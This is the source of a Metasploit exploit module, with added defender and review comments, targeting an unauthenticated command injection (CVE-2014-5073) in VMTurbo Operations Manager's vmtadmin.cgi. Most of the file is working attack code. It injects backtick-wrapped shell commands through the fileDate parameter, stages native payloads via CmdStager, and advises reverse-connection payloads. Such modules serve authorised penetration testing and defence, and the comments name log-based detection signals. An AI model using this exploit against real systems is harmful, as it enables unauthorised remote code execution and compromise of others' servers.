Path: blob/master/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2014-5073: unauthenticated OS command injection in the
# vmtadmin.cgi endpoint of VMTurbo Operations Manager (4.6 and prior, per the
# description below). The injection is blind -- nothing the injected command
# prints comes back in the HTTP response, so the module never observes success
# directly (see #exploit, which reports an "unknown exploitation state").
#
# Defender notes, derived only from the requests this module sends:
# * Both the version probe (#check) and the injected request (#execute_command)
#   are unauthenticated GETs to /cgi-bin/vmtadmin.cgi. The injected request
#   carries callType=DOWN, actionType=CFGBACKUP and a fileDate value wrapped in
#   double quotes and backticks; that parameter combination in web-server
#   access logs is a direct detection signal for attempts.
# * #check intends to treat builds from 28657 upward as patched (its
#   comparison is flawed, see the NOTE there); confirm the fixed build against
#   the vendor advisory in 'References' before relying on it.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::EXE

  # Registers module metadata and targets.
  #
  # @param info [Hash] base module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution',
      'Description' => %q{
        VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated
        OS Command injection in the web interface. Use reverse payloads for the most
        reliable results. Since it is a blind OS command injection vulnerability,
        there is no output for the executed command when using the cmd generic payload.
        Port binding payloads are disregarded due to the restrictive firewall settings.

        This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and
        4.6.
      },
      'Author' =>
        [
          # Secunia Research - Discovery and Metasploit module
          'Emilio Pinna <emilio.pinn[at]gmail.com>'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2014-5073'],
          ['OSVDB', '109572'],
          ['URL', 'http://web.archive.org/web/20140905004331/http://secunia.com:80/secunia_research/2014-8/']
        ],
      'DisclosureDate' => '2014-06-25',
      # The injected command runs as the web server's user, not as root.
      'Privileged' => false,
      'Platform' => %w{ linux unix },
      # Bind-style payloads are excluded; the description attributes this to the
      # appliance's restrictive firewall.
      'Payload' =>
        {
          'Compat' =>
            {
              'ConnectionType' => '-bind'
            }
        },
      'Targets' =>
        [
          # Target 0: a single shell command is sent once (see #exploit).
          [ 'Unix CMD',
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
            }
          ],
          # Target 1 (default): a native payload is staged through CmdStager.
          [ 'VMTurbo Operations Manager',
            {
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget' => 1
    ))

    # The CmdStager flavor is hard-coded to :printf in #exploit, so these two
    # user-facing options would be misleading and are hidden.
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  # Fingerprints the target by asking vmtadmin.cgi for its version string.
  #
  # @return [Exploit::CheckCode] Unknown when the host cannot be reached or the
  #   response does not match the expected version format; Appears when the
  #   parsed version/build falls inside the (string-compared) vulnerable range;
  #   Safe otherwise
  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => "/cgi-bin/vmtadmin.cgi",
        'vars_get' => {
          "callType" => "ACTION",
          "actionType" => "VERSIONS"
        }
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error("Failed to connect to the web server")
      return Exploit::CheckCode::Unknown
    end

    # Capture 1 is the numeric build, capture 2 the dotted release version.
    if res and res.code == 200 and res.body =~ /vmtbuild:([\d]+),vmtrelease:([\d.]+),vmtbits:[\d]+,osbits:[\d]+/
      version = $2
      build = $1

      vprint_status("VMTurbo Operations Manager version #{version} build #{build} detected")
    else
      vprint_status("Unexpected vmtadmin.cgi response")
      return Exploit::CheckCode::Unknown
    end

    # NOTE (@todb): This PHP style comparison seems incorrect, since
    # strings are being compared and not numbers. Example:
    # 1.9.3p547 :001 > a = "4.6"
    # => "4.6"
    # 1.9.3p547 :002 > b = "10.6"
    # => "10.6"
    # 1.9.3p547 :003 > a <= b
    #
    # Also, the description says 4.5 is also vuln. This doesn't
    # appear to care.
    #
    # NOTE(review): `build` is compared lexically as well, so e.g. "9999" < "28657"
    # is false. Both comparisons need numeric (or Gem::Version-style) parsing
    # before this check can be trusted for inventory purposes.
    if version and version <= "4.6" and build < "28657"
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Delivers one command through the injectable fileDate parameter.
  #
  # The response body is never inspected (the injection is blind); only the
  # transport failure is detected.
  #
  # @param cmd [String] shell command to embed
  # @param opts [Hash] accepted for the CmdStager calling convention
  #   (presumably execute_cmdstager passes it); unused here
  # @return [nil] when the connection fails; otherwise the value of the trailing
  #   vprint_status call
  def execute_command(cmd, opts)
    begin
      res = send_request_cgi({
        'uri' => '/cgi-bin/vmtadmin.cgi',
        'method' => 'GET',
        'vars_get' => {
          "callType" => "DOWN",
          "actionType" => "CFGBACKUP",
          "fileDate" => "\"`#{cmd}`\""
        }
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error("Failed to connect to the web server")
      return nil
    end

    vprint_status("Sent command #{cmd}")
  end

  # Entry point: target 0 sends the encoded command payload once; any other
  # target stages a native payload via the CmdStager mixin (:printf flavor).
  def exploit

    # Handle single command shot
    if target.name =~ /CMD/
      cmd = payload.encoded
      res = execute_command(cmd, {})

      unless res
        fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
      end

      # No output path exists for a blind injection, so success is unknowable here.
      print_status("Blind Exploitation - unknown exploitation state")
      return
    end

    # Handle payload upload using CmdStager mixin
    execute_cmdstager({:flavor => :printf})
  end
end